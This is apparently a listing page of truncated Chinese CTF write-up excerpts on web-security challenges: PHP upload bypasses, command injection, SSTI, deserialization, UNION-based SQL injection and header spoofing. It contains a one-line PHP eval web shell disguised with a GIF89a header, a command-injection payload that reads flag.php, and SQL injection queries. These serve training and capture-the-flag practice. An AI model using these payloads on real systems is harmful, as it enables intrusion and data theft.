知识点 常用后缀 php,php3,php4,php5,phtml,pht 常用一句话 GIF89a? <script language="php">eval($_POST['laotun'])</script> 文件类型绕过 Content-type: image/jpeg 解题 .phtml上传成功 蚂剑连接 获取fla…

解题 打开题目，显示/?ip= 应该是传参 直接尝试?ip=127.0.0.1 果然是linux命令执行，尝试其他命令 ?ip=127.0.0.1;ls 成功执行 目标是打开flag.php ?ip=127.0.0.1;cat flag.php ?ip=127.0.0.1;cat index.php 回显/?ip= fxck your space!…

kali的rarcrack安装方法 直接使用代码，线上安装 sudo apt-get install rarcrack 安装libxml2-dev 包 sudo apt-get install libxml2-dev 操作 rarcrack 文件名 --threads 线程数 --type rar|zip|7z 如果你要修改rarcrack里面的字…

知识点 函数 isset() 函数 ：检测变量是否设置 file_get_contents() 函数 ：把整个文件读入一个字符串中 preg_match() 函数 ：执行匹配正则表达式 data伪协议写入文件 data://text/plain filter读取源码 php://filter/read=convert.base64-encode/r…

解题过程 他说了备份，直接使用dirsearch扫目录 -u后面加网站 -e后面加语言 扫到www.zip压缩包 得到源文件： index.php包含如下代码： <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?> cla…

__class__ 返回类型所属的对象 __mro__ 返回一个包含对象所继承的基类元组，方法在解析时按照元组的顺序解析。 __base__ 返回该对象所继承的基类 __base__和__mro__都是用来寻找基类的 __subclasses__ 每个新类都保留了子类的引用，这个方法返回一个类中仍然可用的的引用的列表 __init__ 类的初始化方…

知识点： 1、serialize()函数：用于序列化对象或数组，并返回一个字符串。序列化对象后，可以很方便的将它传递给其他需要它的地方，且其类型和结构不会改变。 2、unserialize()函数：用于将通过serialize()函数序列化后的对象或数组进行反序列化，并返回原始的对象结构。 3、魔术方法：PHP 将所有以 __（两个下划线）开头的类…

题目 成绩查询 题目链接 分析 可以知道这个题共4个数据 构建语句 'or 1=2 union select 1,2,3,4 # 查询表名 'or 1=2 union select group_concat(table_name),2,3,4 from information_schema.columns where table_schema=da…

xff 维基百科： X-Forwarded-For（XFF）是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。 格式：X-Forwarded-For: 123.123.123.123 Referer 维基百科： HTTP来源地址（referer，或HTTPreferer） 是HTTP表头的一个字…

题目链接 需要修改http referer头 - HTTP_REFERER 编辑 - HTTP Referer是header的一部分，当浏览器向web服务器发送请求的时候，一般会带上Referer， - 告诉服务器我是从哪个页面链接过来的，服务器基此可以获得一些信息用于处理。 - 简而言之，HTTP Referer是header的一部分，当浏览器向…